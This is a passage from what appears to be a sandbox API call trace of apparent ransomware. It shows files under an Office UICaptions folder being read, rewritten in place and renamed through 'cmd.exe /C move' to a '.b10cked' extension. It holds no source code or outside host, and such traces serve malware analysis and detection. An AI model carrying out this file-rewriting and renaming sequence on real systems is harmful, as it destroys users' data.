lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb478 [0163.235] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0164.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0164.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb960 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb960 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0164.199] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0164.199] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5caf, lpOverlapped=0x0) returned 1 [0165.716] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0165.716] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5caf, lpOverlapped=0x0) returned 1 [0165.716] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23727, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5cb1 [0165.716] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5caf, lpOverlapped=0x0) returned 1 [0166.099] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23727, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5cb1 [0166.099] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5caf, lpOverlapped=0x0) returned 1 [0166.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0166.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0166.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb960 [0166.104] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0166.105] CloseHandle (hObject=0x114) returned 1 [0166.108] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX") returned 0x3c [0166.109] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0166.109] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf4c, dwThreadId=0xed8)) returned 1 [0166.114] CloseHandle (hObject=0x1b4) returned 1 [0166.114] CloseHandle (hObject=0x114) returned 1 [0166.114] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0166.114] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0166.114] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0xf8) returned 1 [0166.114] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22290413816) returned 1 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x39960 [0166.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x39478 [0166.117] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0166.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0166.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x39960 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x39960 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0166.950] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.041] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xdcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.086] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.086] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.086] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xdcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.087] SetFilePointer (in: hFile=0x114, lDistanceToMove=-117935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ccb1 [0167.087] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.088] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xdcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.089] SetFilePointer (in: hFile=0x114, lDistanceToMove=-117935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ccb1 [0167.089] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.090] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xdcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0167.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0167.095] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x39960 [0167.095] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.095] CloseHandle (hObject=0x114) returned 1 [0167.097] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX") returned 0x3c [0167.097] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.098] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xdf8, dwThreadId=0x910)) returned 1 [0167.103] CloseHandle (hObject=0x1b4) returned 1 [0167.103] CloseHandle (hObject=0x114) returned 1 [0167.103] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.103] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.103] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.104] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.104] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22389361925) returned 1 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 